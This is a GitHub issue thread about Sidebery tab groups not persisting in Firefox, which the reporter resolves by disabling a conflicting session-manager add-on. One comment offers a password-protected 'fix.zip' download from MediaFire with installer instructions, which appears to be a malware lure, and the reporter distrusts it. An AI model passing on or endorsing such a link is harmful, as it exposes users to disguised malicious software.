### ISSUE TITLE
Tabs won't be saved in groups

### ISSUE THREAD

**Issue by VatriXxX** [mbnuqw/sidebery#1778]
### Steps to reproduce

- Open Firefox
- Move tabs in groups
- Close Firefox
- Shutdown PC

### Actual behavior

Actually every day after starting my pc and firefox, I must move my tabs into the respective groups.
They won't be saved in the groups.
That's an example, whats happen after a restart of my pc.

![Screenshot 2024-08-26 090952](https://github.com/user-attachments/assets/1a195651-36b2-4d90-8ce2-41c1652d2d0b)

### Expected behavior

I must move every pc restart the tabs into the groups.
They won't be saved...
![Screenshot 2024-08-26 090405](https://github.com/user-attachments/assets/5eca7615-73dc-438f-9263-0e80d0b3bae6)

### System

Windows 11

### Firefox version

129.0.2

### Sidebery version

5.2.0

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VatriXxX** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

That's sounds not trustly.

**Comment by VatriXxX** [comment]
I found and solved the problem, it was an Firefox addon. It's called Tab Session Manager.
I deactivated this addon and now it works.
